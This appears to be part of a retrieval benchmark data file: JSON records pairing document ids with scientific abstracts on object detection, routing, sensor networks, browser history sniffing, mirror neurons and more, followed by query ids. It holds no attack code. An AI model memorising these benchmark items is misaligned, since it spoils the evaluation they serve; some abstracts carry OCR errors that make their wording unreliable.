"text": "For object detection, the two-stage approach (e.g., Faster R-CNN) has been achieving the highest accuracy, whereas the one-stage approach (e.g., SSD) has the advantage of high efficiency. To inherit the merits of both while overcoming their disadvantages, in this paper, we propose a novel single-shot based detector, called RefineDet, that achieves better accuracy than two-stage methods and maintains comparable efficiency of one-stage methods. RefineDet consists of two inter-connected modules, namely, the anchor refinement module and the object detection module. Specifically, the former aims to (1) filter out negative anchors to reduce search space for the classifier, and (2) coarsely adjust the locations and sizes of anchors to provide better initialization for the subsequent regressor. The latter module takes the refined anchors as the input from the former to further improve the regression accuracy and predict multi-class label. Meanwhile, we design a transfer connection block to transfer the features in the anchor refinement module to predict locations, sizes and class labels of objects in the object detection module. The multitask loss function enables us to train the whole network in an end-to-end way. Extensive experiments on PASCAL VOC 2007, PASCAL VOC 2012, and MS COCO demonstrate that RefineDet achieves state-of-the-art detection accuracy with high efficiency. Code is available at https://github.com/sfzhang15/RefineDet.",
"title": ""
},
{
"docid": "92d3987fc0b5d5962f50871ecc23743e",
"text": "Wireless sensor networks (WSNs) have become a hot area of research in recent years due to the realization of their ability in myriad applications including military surveillance, facility monitoring, target detection, and health care applications. However, many WSN design problems involve tradeoffs between multiple conflicting optimization objectives such as coverage preservation and energy conservation. Many of the existing sensor network design approaches, however, generally focus on a single optimization objective. For example, while both energy conservation in a cluster-based WSNs and coverage-maintenance protocols have been extensively studied in the past, these have not been integrated in a multi-objective optimization manner. This paper employs a recently developed multiobjective optimization algorithm, the so-called multi-objective evolutionary algorithm based on decomposition (MOEA/D) to solve simultaneously the coverage preservation and energy conservation design problems in cluster-based WSNs. The performance of the proposed approach, in terms of coverage and network lifetime is compared with a state-of-the-art evolutionary approach called NSGA II. Under the same environments, simulation results on different network topologies reveal that MOEA/D provides a feasible approach for extending the network lifetime while preserving more coverage area.",
"title": ""
},
{
"docid": "9775092feda3a71c1563475bae464541",
"text": "Open Shortest Path First (OSPF) is the most commonly used intra-domain internet routing protocol. Traffic flow is routed along shortest paths, sptitting flow at nodes where several outgoing tinks are on shortest paths to the destination. The weights of the tinks, and thereby the shortest path routes, can be changed by the network operator. The weights could be set proportional to their physical distances, but often the main goal is to avoid congestion, i.e. overloading of links, and the standard heuristic rec. ommended by Cisco is to make the weight of a link inversely proportional to its capacity. Our starting point was a proposed AT&T WorldNet backbone with demands projected from previous measurements. The desire was to optimize the weight setting based on the projected demands. We showed that optimiz@ the weight settings for a given set of demands is NP-hard, so we resorted to a local search heuristic. Surprisingly it turned out that for the proposed AT&T WorldNet backbone, we found weight settiis that performed within a few percent from that of the optimal general routing where the flow for each demand is optimalty distributed over all paths between source and destination. This contrasts the common belief that OSPF routing leads to congestion and it shows that for the network and demand matrix studied we cannot get a substantially better load balancing by switching to the proposed more flexible Multi-protocol Label Switching (MPLS) technologies. Our techniques were atso tested on synthetic internetworks, based on a model of Zegura et al. (INFOCOM’96), for which we dld not always get quite as close to the optimal general routing. However, we compared witIs standard heuristics, such as weights inversely proportional to the capac.. ity or proportioml to the physical distances, and found that, for the same network and capacities, we could support a 50 Yo-1 10% increase in the demands. Our assumed demand matrix can also be seen as modeling service level agreements (SLAS) with customers, with demands representing guarantees of throughput for virtnal leased lines. Keywords— OSPF, MPLS, traffic engineering, local search, hashing ta. bles, dynamic shortest paths, mntti-cosnmodity network flows.",
"title": ""
},
{
"docid": "125c145b143579528279e76d23fa3054",
"text": "Social unrest is endemic in many societies, and recent news has drawn attention to happenings in Latin America, the Middle East, and Eastern Europe. Civilian populations mobilize, sometimes spontaneously and sometimes in an organized manner, to raise awareness of key issues or to demand changes in governing or other organizational structures. It is of key interest to social scientists and policy makers to forecast civil unrest using indicators observed on media such as Twitter, news, and blogs. We present an event forecasting model using a notion of activity cascades in Twitter (proposed by Gonzalez-Bailon et al., 2011) to predict the occurrence of protests in three countries of Latin America: Brazil, Mexico, and Venezuela. The basic assumption is that the emergence of a suitably detected activity cascade is a precursor or a surrogate to a real protest event that will happen \"on the ground.\" Our model supports the theoretical characterization of large cascades using spectral properties and uses properties of detected cascades to forecast events. Experimental results on many datasets, including the recent June 2013 protests in Brazil, demonstrate the effectiveness of our approach.",
"title": ""
},
{
"docid": "62f0b66b176a87098b7f31e5a651eb5a",
"text": "Transfer learning has recently attracted significant research attention, as it simultaneously learns from different source domains, which have plenty of labeled data, and transfers the relevant knowledge to the target domain with limited labeled data to improve the prediction performance. We propose a Bayesian transfer learning framework, in the homogeneous transfer learning scenario, where the source and target domains are related through the joint prior density of the model parameters. The modeling of joint prior densities enables better understanding of the “transferability” between domains. We define a joint Wishart distribution for the precision matrices of the Gaussian feature-label distributions in the source and target domains to act like a bridge that transfers the useful information of the source domain to help classification in the target domain by improving the target posteriors. Using several theorems in multivariate statistics, the posteriors and posterior predictive densities are derived in closed forms with hypergeometric functions of matrix argument, leading to our novel closed-form and fast Optimal Bayesian Transfer Learning (OBTL) classifier. Experimental results on both synthetic and real-world benchmark data confirm the superb performance of the OBTL compared to the other state-of-the-art transfer learning and domain adaptation methods.",
"title": ""
},
{
"docid": "85d31f3940ee258589615661e596211d",
"text": "Bulk Synchronous Parallelism (BSP) provides a good model for parallel processing of many large-scale graph applications, however it is unsuitable/inefficient for graph applications that require coordination, such as graph-coloring, subcoloring, and clustering. To address this problem, we present an efficient modification to the BSP model to implement serializability (sequential consistency) without reducing the highlyparallel nature of BSP. Our modification bypasses the message queues in BSP and reads directly from the worker’s memory for the internal vertex executions. To ensure serializability, coordination is performed— implemented via dining philosophers or token ring— only for border vertices partitioned across workers. We implement our modifications to BSP on Giraph, an open-source clone of Google’s Pregel. We show through a graph-coloring application that our modified framework, Giraphx, provides much better performance than implementing the application using dining-philosophers over Giraph. In fact, Giraphx outperforms Giraph even for embarrassingly parallel applications that do not require coordination, e.g., PageRank.",
"title": ""
},
{
"docid": "3005c32c7cf0e90c59be75795e1c1fbc",
"text": "In this paper, a novel AR interface is proposed that provides generic solutions to the tasks involved in augmenting simultaneously different types of virtual information and processing of tracking data for natural interaction. Participants within the system can experience a real-time mixture of 3D objects, static video, images, textual information and 3D sound with the real environment. The user-friendly AR interface can achieve maximum interaction using simple but effective forms of collaboration based on the combinations of human–computer interaction techniques. To prove the feasibility of the interface, the use of indoor AR techniques are employed to construct innovative applications and demonstrate examples from heritage to learning systems. Finally, an initial evaluation of the AR interface including some initial results is presented.",
"title": ""
},
{
"docid": "90f188c1f021c16ad7c8515f1244c08a",
"text": "Minimally invasive principles should be the driving force behind rehabilitating young individuals affected by severe dental erosion. The maxillary anterior teeth of a patient, class ACE IV, has been treated following the most conservatory approach, the Sandwich Approach. These teeth, if restored by conventional dentistry (eg, crowns) would have required elective endodontic therapy and crown lengthening. To preserve the pulp vitality, six palatal resin composite veneers and four facial ceramic veneers were delivered instead with minimal, if any, removal of tooth structure. In this article, the details about the treatment are described.",
"title": ""
},
{
"docid": "7cc63b60c80e72fec2cc53679df74bf3",
"text": "Neural abstractive summarization models have led to promising results in summarizing relatively short documents. We propose the first model for abstractive summarization of single, longer-form documents (e.g., research papers). Our approach consists of a new hierarchical encoder that models the discourse structure of a document, and an attentive discourse-aware decoder to generate the summary. Empirical results on two large-scale datasets of scientific papers show that our model significantly outperforms state-of-the-art models.",
"title": ""
},
{
"docid": "21b8998910c792d389ccd8a6d8620555",
"text": "Theory and research suggest that people can increase their happiness through simple intentional positive activities, such as expressing gratitude or practicing kindness. Investigators have recently begun to study the optimal conditions under which positive activities increase happiness and the mechanisms by which these effects work. According to our positive-activity model, features of positive activities (e.g., their dosage and variety), features of persons (e.g., their motivation and effort), and person-activity fit moderate the effect of positive activities on well-being. Furthermore, the model posits four mediating variables: positive emotions, positive thoughts, positive behaviors, and need satisfaction. Empirical evidence supporting the model and future directions are discussed.",
"title": ""
},
{
"docid": "9ec200a078990407fc199c822f7f15b2",
"text": "We present Char2Wav, an end-to-end model for speech synthesis. Char2Wav has two components: a reader and a neural vocoder. The reader is an encoderdecoder model with attention. The encoder is a bidirectional recurrent neural network that accepts text or phonemes as inputs, while the decoder is a recurrent neural network (RNN) with attention that produces vocoder acoustic features. Neural vocoder refers to a conditional extension of SampleRNN which generates raw waveform samples from intermediate representations. Unlike traditional models for speech synthesis, Char2Wav learns to produce audio directly from text.",
"title": ""
},
{
"docid": "308622daf5f4005045f3d002f5251f8c",
"text": "The design of multiple human activity recognition applications in areas such as healthcare, sports and safety relies on wearable sensor technologies. However, when making decisions based on the data acquired by such sensors in practical situations, several factors related to sensor data alignment, data losses, and noise, among other experimental constraints, deteriorate data quality and model accuracy. To tackle these issues, this paper presents a data-driven iterative learning framework to classify human locomotion activities such as walk, stand, lie, and sit, extracted from the Opportunity dataset. Data acquired by twelve 3-axial acceleration sensors and seven inertial measurement units are initially de-noised using a two-stage consecutive filtering approach combining a band-pass Finite Impulse Response (FIR) and a wavelet filter. A series of statistical parameters are extracted from the kinematical features, including the principal components and singular value decomposition of roll, pitch, yaw and the norm of the axial components. The novel interactive learning procedure is then applied in order to minimize the number of samples required to classify human locomotion activities. Only those samples that are most distant from the centroids of data clusters, according to a measure presented in the paper, are selected as candidates for the training dataset. The newly built dataset is then used to train an SVM multi-class classifier. The latter will produce the lowest prediction error. The proposed learning framework ensures a high level of robustness to variations in the quality of input data, while only using a much lower number of training samples and therefore a much shorter training time, which is an important consideration given the large size of the dataset.",
"title": ""
},
{
"docid": "c17e6363762e0e9683b51c0704d43fa7",
"text": "Your use of the JSTOR archive indicates your acceptance of JSTOR's Terms and Conditions of Use, available at http://www.jstor.org/about/terms.html. JSTOR's Terms and Conditions of Use provides, in part, that unless you have obtained prior permission, you may not download an entire issue of a journal or multiple copies of articles, and you may use content in the JSTOR archive only for your personal, non-commercial use.",
"title": ""
},
{
"docid": "18a0eec596fb50bad21fde87162220cf",
"text": "In this work, the synthesis of stable silver nanoparticles by the bioreduction method was investigated. Aqueous extracts of the manna of hedysarum plant and the soap-root (Acanthe phylum bracteatum) plant were used as reducing and stabilizing agents, respectively. UV-Vis absorption spectroscopy was used to monitor the quantitative formation of silver nanoparticles. The characteristics of the obtained silver nanoparticles were studied using X-ray diffraction analysis (XRD), energy-dispersive spectroscopy (EDX), and scanning electron microscopy (SEM). The EDX spectrum of the solution containing silver nanoparticles confirmed the presence of an elemental silver signal without any peaks of impurities. The average diameter of the prepared nanoparticles in solution was about 29-68 nm.",
"title": ""
},
{
"docid": "74fcade8e5f5f93f3ffa27c4d9130b9f",
"text": "Resampling is an important signature of manipulated images. In this paper, we propose two methods to detect and localize image manipulations based on a combination of resampling features and deep learning. In the first method, the Radon transform of resampling features are computed on overlapping image patches. Deep learning classifiers and a Gaussian conditional random field model are then used to create a heatmap. Tampered regions are located using a Random Walker segmentation method. In the second method, resampling features computed on overlapping image patches are passed through a Long short-term memory (LSTM) based network for classification and localization. We compare the performance of detection/localization of both these methods. Our experimental results show that both techniques are effective in detecting and localizing digital image forgeries.",
"title": ""
},
{
"docid": "1e3a9019adc6e39982c38326bb39c6de",
"text": "Mirror neurons are a relatively new phenomena, first observed in the premotor cortex of macaque monkeys when a number of neurons were observed to respond both when a monkey performed a goal orientated task, and when the monkey watched another (human or monkey) perform that task. A number of researchers have suggested that mirror neurons also exist in humans. It is proposed that a human mirror neuron system may contribute to a number of cognitive functions such as action understanding; ‘theory of mind’, humans’ abilities to infer another’s mental state through experiences or others’ behaviour; emotion understanding; imitation; and speech perception. Faulty human mirror neurons have even been suggested to underpin social impairments such as those characteristic of Autistic Spectrum Disorder (ASD). However, there has been much debate regarding the existence and functional roles of mirror neurons in humans. While there is much literature regarding human mirror neurons, the majority consist of reviews while few concern empirical experiments. Additionally concern has been expressed for some of the experimental methods used in empirical studies. A recent experiment from Mukamel et al. (2010) is the first of its kind to directly gather evidence for the existence of mirror neurons in humans and for their function subserving action understanding. The present review critically outlines the growth in this controversial field of research, taking into account the recent direct recording of human mirror neurons, and what implications this may have on our understanding of social cognition.",
"title": ""
},
{
"docid": "2247a7972e853221e0e04c9761847c04",
"text": "Recently, as real-time Ethernet based protocols, especially EtherCAT have become more widely used in various fields such as automation systems and motion control, many studies on their design have been conducted. In this paper, we describe a method for the design of an EtherCAT slave module we developed and its application to a closed loop motor drive. Our EtherCAT slave module consists of the ARM Cortex-M3 as the host controller and ET1100 as the EtherCAT slave controller. These were interfaced with a parallel interface instead of the SPI used by many researchers and developers. To measure the performance of this device, 32-axis closed loop step motor drives were used and the experimental results in the test environment are described.",
"title": ""
},
{
"docid": "ae4b651ea8bd6b4c7c6efcc52f76516e",
"text": "We study a regularization framework where we feed an original clean data point and a nearby point through a mapping, which is then penalized by the Euclidian distance between the corresponding outputs. The nearby point may be chosen randomly or adversarially. A more general form of this framework has been presented in (Bachman et al., 2014). We relate this framework to many existing regularization methods: It is a stochastic estimate of penalizing the Frobenius norm of the Jacobian of the mapping as in Poggio & Girosi (1990), it generalizes noise regularization (Sietsma & Dow, 1991), and it is a simplification of the canonical regularization term by the ladder networks in Rasmus et al. (2015). We also investigate the connection to virtual adversarial training (VAT) (Miyato et al., 2016) and show how VAT can be interpreted as penalizing the largest eigenvalue of a Fisher information matrix. Our contribution is discovering connections between the studied and other existing regularization methods.",
"title": ""
},
{
"docid": "394ba7f036d578def70082b8c31f315f",
"text": "With the rapid growth of web images, hashing has received increasing interests in large scale image retrieval. Research efforts have been devoted to learning compact binary codes that preserve semantic similarity based on labels. However, most of these hashing methods are designed to handle simple binary similarity. The complex multi-level semantic structure of images associated with multiple labels have not yet been well explored. Here we propose a deep semantic ranking based method for learning hash functions that preserve multilevel semantic similarity between multi-label images. In our approach, deep convolutional neural network is incorporated into hash functions to jointly learn feature representations and mappings from them to hash codes, which avoids the limitation of semantic representation power of hand-crafted features. Meanwhile, a ranking list that encodes the multilevel similarity information is employed to guide the learning of such deep hash functions. An effective scheme based on surrogate loss is used to solve the intractable optimization problem of nonsmooth and multivariate ranking measures involved in the learning procedure. Experimental results show the superiority of our proposed approach over several state-of-the-art hashing methods in term of ranking evaluation metrics when tested on multi-label image datasets.",
"title": ""
}
] | scidocsrr |
933e8eac678af7a21af65a2516cba2e4 | Predicting User Replying Behavior on a Large Online Dating Site | [
{
"docid": "29d9137c5fdc7e96e140f19acd6dee80",
"text": "Given a snapshot of a social network, can we infer which new interactions among its members are likely to occur in the near future? We formalize this question as the link prediction problem, and develop approaches to link prediction based on measures the \"proximity\" of nodes in a network. Experiments on large co-authorship networks suggest that information about future interactions can be extracted from network topology alone, and that fairly subtle measures for detecting node proximity can outperform more direct measures.",
"title": ""
},
{
"docid": "65fd482ac37852214fc82b4bc05c6f72",
"text": "This paper examines important factors for link prediction in networks and provides a general, high-performance framework for the prediction task. Link prediction in sparse networks presents a significant challenge due to the inherent disproportion of links that can form to links that do form. Previous research has typically approached this as an unsupervised problem. While this is not the first work to explore supervised learning, many factors significant in influencing and guiding classification remain unexplored. In this paper, we consider these factors by first motivating the use of a supervised framework through a careful investigation of issues such as network observational period, generality of existing methods, variance reduction, topological causes and degrees of imbalance, and sampling approaches. We also present an effective flow-based predicting algorithm, offer formal bounds on imbalance in sparse network link prediction, and employ an evaluation method appropriate for the observed imbalance. Our careful consideration of the above issues ultimately leads to a completely general framework that outperforms unsupervised link prediction methods by more than 30% AUC.",
"title": ""
},
{
"docid": "d438d948601b22f7de6ec9ecaaf04c63",
"text": "Location plays an essential role in our lives, bridging our online and offline worlds. This paper explores the interplay between people's location, interactions, and their social ties within a large real-world dataset. We present and evaluate Flap, a system that solves two intimately related tasks: link and location prediction in online social networks. For link prediction, Flap infers social ties by considering patterns in friendship formation, the content of people's messages, and user location. We show that while each component is a weak predictor of friendship alone, combining them results in a strong model, accurately identifying the majority of friendships. For location prediction, Flap implements a scalable probabilistic model of human mobility, where we treat users with known GPS positions as noisy sensors of the location of their friends. We explore supervised and unsupervised learning scenarios, and focus on the efficiency of both learning and inference. We evaluate Flap on a large sample of highly active users from two distinct geographical areas and show that it (1) reconstructs the entire friendship graph with high accuracy even when no edges are given; and (2) infers people's fine-grained location, even when they keep their data private and we can only access the location of their friends. Our models significantly outperform current comparable approaches to either task.",
"title": ""
}
] | [
{
"docid": "1ae16863be5df70d33d4a7f6a685ab17",
"text": "Frank Chen • Zvi Drezner • Jennifer K. Ryan • David Simchi-Levi Decision Sciences Department, National University of Singapore, 119260 Singapore Department of MS & IS, California State University, Fullerton, California 92834 School of Industrial Engineering, Purdue University, West Lafayette, Indiana 47907 Department of IE & MS, Northwestern University, Evanston, Illinois 60208 fbachen@nus.edu.sg • drezner@exchange.fullerton.edu • jkryan@ecn.purdue.edu • levi@iems.nwu.edu",
"title": ""
},
{
"docid": "30038a6e8aa8380d65d33ff5ad6da191",
"text": "Summary\nState-of-the-art light and electron microscopes are capable of acquiring large image datasets, but quantitatively evaluating the data often involves manually annotating structures of interest. This process is time-consuming and often a major bottleneck in the evaluation pipeline. To overcome this problem, we have introduced the Trainable Weka Segmentation (TWS), a machine learning tool that leverages a limited number of manual annotations in order to train a classifier and segment the remaining data automatically. In addition, TWS can provide unsupervised segmentation learning schemes (clustering) and can be customized to employ user-designed image features or classifiers.\n\n\nAvailability and Implementation\nTWS is distributed as open-source software as part of the Fiji image processing distribution of ImageJ at http://imagej.net/Trainable_Weka_Segmentation .\n\n\nContact\nignacio.arganda@ehu.eus.\n\n\nSupplementary information\nSupplementary data are available at Bioinformatics online.",
"title": ""
},
{
"docid": "0220627680b0cadbb3241cb20ff0b962",
"text": "One of the biggest health challenges of 21st century is diabetics due to its exponential increase in the diabetics patients in the age group of 20–79 years. To prevent the complication due to diabetics it is essential to monitor the blood glucose level continuously. Most of the regular glucose measurement systems are invasive in nature. Invasive methods cause pain, time consumption, high cost and potential risk of spreading infection diseases. Therefore there is a great demand to have reliable cost effective and comfortable non invasive system for the detection of blood glucose level continuously. The proposed method is based on the direct effect of glucose on the scattering properties of the organ. Glucose decreases the mismatch in refractive index between scatterers and their surrounding media, leading to a smaller scattering coefficient and, consequently, a shorter optical path. The reduction in scattering is due to an increase in glucose concentration. As a result, with the growing concentration of glucose, fewer photons are absorbed and the light intensity increases. In the present work, we have used PPG technique. An algorithm was developed from the PPG data for monitoring blood glucose. The result obtained from this technique was compared with ARKRAY, Glucocard tm01-mini and found good agreement.",
"title": ""
},
{
"docid": "1285bd50bb6462b9864d61a59e77435e",
"text": "Precision Agriculture is advancing but not as fast as predicted 5 years ago. The development of proper decision-support systems for implementing precision decisions remains a major stumbling block to adoption. Other critical research issues are discussed, namely, insufficient recognition of temporal variation, lack of whole-farm focus, crop quality assessment methods, product tracking and environmental auditing. A generic research programme for precision agriculture is presented. A typology of agriculture countries is introduced and the potential of each type for precision agriculture discussed.",
"title": ""
},
{
"docid": "a74fbe2dc0f233420f6f0ec336124957",
"text": "The study aims for development of an efficient polymeric carrier for evaluating pharmaceutical potentialities in modulating the drug profile of quercetin (QUE) in anti-diabetic research. Alginate and succinyl chitosan are focused in this investigation for encapsulating quercetin into core-shell nanoparticles through ionic cross linking. The FT-IR, XRD, NMR, SEM, TEM, drug entrapment and loading efficiency are commenced to examine the efficacy of the prepared nanoparticles in successful quercetin delivery. Obtained results showed the minimum particle size of ∼91.58nm and ∼95% quercetin encapsulation efficiently of the particles with significant pH sensitivity. Kinetics of drug release suggested self-sustained QUE release following the non-fickian trend. A pronounced hypoglycaemic effect and efficient maintenance of glucose homeostasis was evident in diabetic rat after peroral delivery of these quercetin nanoparticles in comparison to free oral quercetin. This suggests the fabrication of an efficient carrier of oral quercetin for diabetes treatment.",
"title": ""
},
{
"docid": "3ae7bf75f82584fea608d49dfe3b63ad",
"text": "History sniffing attacks allow web sites to learn about users' visits to other sites. The major browsers have recently adopted a defense against the current strategies for history sniffing. In a user study with 307 participants, we demonstrate that history sniffing remains feasible via interactive techniques which are not covered by the defense. While these techniques are slower and cannot hope to learn as much about users' browsing history, we see no practical way to defend against them.",
"title": ""
},
{
"docid": "999aef425b90782b85c9b5e8b32129d7",
"text": "Data analysis has become a fundamental task in analytical chemistry due to the great quantity of analytical information provided by modern analytical instruments. Supervised pattern recognition aims to establish a classification model based on experimental data in order to assign unknown samples to a previously defined sample class based on its pattern of measured features. The basis of the supervised pattern recognition techniques mostly used in food analysis are reviewed, making special emphasis on the practical requirements of the measured data and discussing common misconceptions and errors that might arise. Applications of supervised pattern recognition in the field of food chemistry appearing in bibliography in the last two years are also reviewed.",
"title": ""
},
{
"docid": "4f5afcb6bd3f731c15e22beadc13f877",
"text": "Continuous improvements in communication technologies over copper pair access networks have enabled hybrid fiber/copper access networks that provide ever increasing broadband data rates. Most recently, field trials have demonstrated that crosstalk cancellation, also referred to as vectoring, and bonding two pairs to push data rates of very high speed DSL above 100 Mb/s on a single copper pair and above 200 Mb/s on two copper pairs. Looking ahead, the G.fast project group of the ITU-T is currently defining a new copper access technology to provide aggregate (upstream and downstream) data rates of up to 1 Gb/s over distances up to 250 m. This article provides an overview of some key challenges that need to be addressed for G.fast.",
"title": ""
},
{
"docid": "3458d30f25a6748748a6e793d64a9ea2",
"text": "A Monte Carlo c^timization technique called \"simulated annealing\" is a descent algorithm modified by random ascent moves in order to escape local minima which are not global minima. Tlie levd of randomization is determined by a control parameter T, called temperature, which tends to zero according to a deterministic \"cooling schedule\". We give a simple necessary and suffident conditicm on the cooling sdiedule for the algorithm state to converge in probability to the set of globally minimiim cost states. In the spedal case that the cooling schedule has parameuic form r({) » c/log(l + / ) , the condition for convergence is that c be greater than or equal to the depth, suitably defined, of the deepest local minimum which is not a global minimum state.",
"title": ""
},
{
"docid": "bc98a124101c25116182a1a8f21e328e",
"text": "Serverless computing lets businesses and application developers focus on the program they need to run, without worrying about the machine on which it runs, or the resources it requires.",
"title": ""
},
{
"docid": "f5a8b13fbf2376cf94acd47e5ffe1178",
"text": "P is computed by a Seq2Seq model with attention, requires utterance x but not logical form y. ● Active learning score = linear combination of features using weights from binary classifier. ○ Predict if Forward S2S selects utterances. ○ Trained on ATIS dev corpus. ● Binary classifier to predict Forward S2S using ○ RNN LF language model ○ Backward S2S model ● Margins between the best and second best hypotheses ● Source token frequency ● Utterance log loss ● Encoder and decoder last hidden states Backward Classifier",
"title": ""
},
{
"docid": "59d194764511b1ad2ce0ca5d858fab21",
"text": "Humanoid robot path finding is one of the core-technologies in robot research domain. This paper presents an approach to finding a path for robot motion by fusing images taken by the NAO's camera and proximity information delivered by sonar sensors. The NAO robot takes an image around its surroundings, uses the fuzzy color extractor to segment its potential path colors, and selects a fitting line as path by the least squares method. Therefore, the NAO robot is able to perform the automatic navigation according to the selected path. As a result, the experiments are conducted to navigate the NAO robot to walk to a given destination and to grasp a box. In addition, the NAO robot uses its sonar sensors to detect a barrier and helps pick up the box with its hands.",
"title": ""
},
{
"docid": "26cd7a502fcbf2455b58365299dc8432",
"text": "Derivative traders are usually required to scan through hundreds, even thousands of possible trades on a daily-basis; a concrete case is the so-called Mid-Curve Calendar Spread (MCCS). The actual procedure in place is full of pitfalls and a more systematic approach where more information at hand is crossed and aggregated to find good trading picks can be highly useful and undoubtedly increase the trader’s productivity. Therefore, in this work we propose an MCCS Recommendation System based on a stacking approach through Neural Networks. In order to suggest that such approach is methodologically and computationally feasible, we used a list of 15 different types of US Dollar MCCSs regarding expiration, forward and swap tenure. For each MCCS, we used 10 years of historical data ranging weekly from Sep/06 to Sep/16. Then, we started the modelling stage by: (i) fitting the base learners using as the input sensitivity metrics linked with the MCCS at time t, and its subsequent annualized returns as the output; (ii) feeding the prediction from each base model to a particular stacker; and (iii) making predictions and comparing different modelling methodologies by a set of performance metrics and benchmarks. After establishing a backtesting engine and setting performance metrics, our results suggest that our proposed Neural Network stacker compared favourably to other combination procedures.",
"title": ""
},
{
"docid": "ac559a0d26723632be3a8e7e8ecadccc",
"text": "The success of Ambient Intelligence (AmI) will depend on how secure it can be made, how privacy and other rights of individuals can be protected and how individuals can come to trust the intelligent world that surrounds them and through which they move. This article addresses these issues by analysing scenarios for ambient intelligence applications that have been developed over the last few years. It elaborates the assumptions that promotors make about the likely use of the technology and possibly unwanted side effects. It concludes with a number of threats for personal privacy that become evident. c © 2005 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "ab9f99378328dbfbec1a81ca9557b2f1",
"text": "This paper presents the results of a concurrent, nested, mixed methods exploratory study on the safety and e ectiveness of the use of a 30 lb weighted blanket with a convenience sample of 32 adults. Safety is investigated measuring blood pressure, pulse rate, and pulse oximetry, and e ectiveness by electrodermal activity (EDA), the State Trait Anxiety Inventory-10 and an exit survey. The results reveal that Brian Mullen (E-mail: Bmullen@student.umass.edu), BS, is Graduate Research Assistant, Sundar Krishnamurty (E-mail: skrishna@ecs.umass.edu), PhD, is In terim Department Head and Associate Professor, and Robert X. Gao (E-mail: Gao@ecs.umass.edu), PhD, is Professor; all are at University of MassachusettsAmherst, Department of Mechanical & Industrial Engineering–ELAB Building, 160 Governors Drive, Amherst, MA 01003 . Tina Champagne (E-mail: Tina_Champagne@cooley-dickinson.org), MEd, OTR/L, is Occupational Therapy and Group Program Supervisor, and Debra Dickson (E-mail: Debra_Dickson@cooley-dickinson.org), APRN, BC, is Behavioral Health Clinical Nurse Specialist; both are at Cooley Dickinson Hospital, Acute Inpatient Behav ioral Health Department, 30 Locust Street, Northampton, MA 01060. Address correspondence to Tina Champagne at the above address. The authors wish to acknowledge and thank the UMASS-Amherst School of Nursing for providing use of the nursing lab and vital signs monitoring equipment for the pur poses of this study and to Dr. Keli Mu for his assistance with the revisions of this paper. Occupational Therapy in Mental Health, Vol. 24(1) 2008 Available online at http://otmh.haworthpress.com © 2008 by The Haworth Press. All rights reserved. doi:10.1300/J004v24n01_05 65 the use of the 30 lb weighted blanket, in the lying down position, is safe as evidenced by the vital sign metrics. Data obtained on e ectiveness reveal 33% demonstrated lowering in EDA when using the weighted blanket, 63% reported lower anxiety after use, and 78% preferred the weighted blanket as a calming modality. The results of this study will be used to form the basis for subsequent research on the therapeutic in u ence of the weighted blanket with adults during an acute inpatient mental health admission.doi:10.1300/J004v24n01_05 [Article copies available for a fee from The Haworth Document Delivery Service: 1-800-HAWORTH. E-mail address: <docdelivery@haworthpress.com> Website: <http://www.HaworthPress. com> © 2008 by The Haworth Press. All rights reserved.]",
"title": ""
},
{
"docid": "20addc21432cf4c9f83d5768777be660",
"text": "These are the days of Growth and Innovation for a better future. Now-a-days companies are bound to realize need of Big Data to make decision over complex problem. Big Data is a term that refers to collection of large datasets containing massive amount of data whose size is in the range of Petabytes, Zettabytes, or with high rate of growth, and complexity that make them difficult to process and analyze using conventional database technologies. Big Data is generated from various sources such as social networking sites like Facebook, Twitter etc, and the data that is generated can be in various formats like structured, semi-structured or unstructured format. For extracting valuable information from this huge amount of Data, new tools and techniques is a need of time for the organizations to derive business benefits and to gain competitive advantage over the market. In this paper a comprehensive study of major Big Data emerging technologies by highlighting their important features and how they work, with a comparative study between them is presented. This paper also represents performance analysis of Apache Hive query for executing Twitter tweets in order to calculate Map Reduce CPU time spent and total time taken to finish the job.",
"title": ""
},
{
"docid": "357e09114978fc0ac1fb5838b700e6ca",
"text": "Instance level video object segmentation is an important technique for video editing and compression. To capture the temporal coherence, in this paper, we develop MaskRNN, a recurrent neural net approach which fuses in each frame the output of two deep nets for each object instance — a binary segmentation net providing a mask and a localization net providing a bounding box. Due to the recurrent component and the localization component, our method is able to take advantage of long-term temporal structures of the video data as well as rejecting outliers. We validate the proposed algorithm on three challenging benchmark datasets, the DAVIS-2016 dataset, the DAVIS-2017 dataset, and the Segtrack v2 dataset, achieving state-of-the-art performance on all of them.",
"title": ""
},
{
"docid": "4081b87cf7459679267d4ba203c4c541",
"text": "Incidental scene text spotting is considered one of the most difficult and valuable challenges in the document analysis community. Most existing methods treat text detection and recognition as separate tasks. In this work, we propose a unified end-to-end trainable Fast Oriented Text Spotting (FOTS) network for simultaneous detection and recognition, sharing computation and visual information among the two complementary tasks. Specifically, RoIRotate is introduced to share convolutional features between detection and recognition. Benefiting from convolution sharing strategy, our FOTS has little computation overhead compared to baseline text detection network, and the joint training method makes our method perform better than these two-stage methods. Experiments on ICDAR 2015, ICDAR 2017 MLT, and ICDAR 2013 datasets demonstrate that the proposed method outperforms state-of-the-art methods significantly, which further allows us to develop the first real-time oriented text spotting system which surpasses all previous state-of-the-art results by more than 5% on ICDAR 2015 text spotting task while keeping 22.6 fps.",
"title": ""
},
{
"docid": "78b8da26d1ca148b8c261c6cfdc9b2b6",
"text": "Collaborative filtering (CF) aims to build a model from users' past behaviors and/or similar decisions made by other users, and use the model to recommend items for users. Despite of the success of previous collaborative filtering approaches, they are all based on the assumption that there are sufficient rating scores available for building high-quality recommendation models. In real world applications, however, it is often difficult to collect sufficient rating scores, especially when new items are introduced into the system, which makes the recommendation task challenging. We find that there are often \" short \" texts describing features of items, based on which we can approximate the similarity of items and make recommendation together with rating scores. In this paper we \" borrow \" the idea of vector representation of words to capture the information of short texts and embed it into a matrix factorization framework. We empirically show that our approach is effective by comparing it with state-of-the-art approaches.",
"title": ""
},
{
"docid": "43db0f06e3de405657996b46047fa369",
"text": "Given two or more objects of general topology, intermediate objects are constructed by a distance field metamorphosis. In the presented method the interpolation of the distance field is guided by a warp function controlled by a set of corresponding anchor points. Some rules for defining a smooth least-distorting warp function are given. To reduce the distortion of the intermediate shapes, the warp function is decomposed into a rigid rotational part and an elastic part. The distance field interpolation method is modified so that the interpolation is done in correlation with the warp function. The method provides the animator with a technique that can be used to create a set of models forming a smooth transition between pairs of a given sequence of keyframe models. The advantage of the new approach is that it is capable of morphing between objects having a different topological genus where no correspondence between the geometric primitives of the models needs to be established. The desired correspondence is defined by an animator in terms of a relatively small number of anchor points",
"title": ""
}
] | scidocsrr |
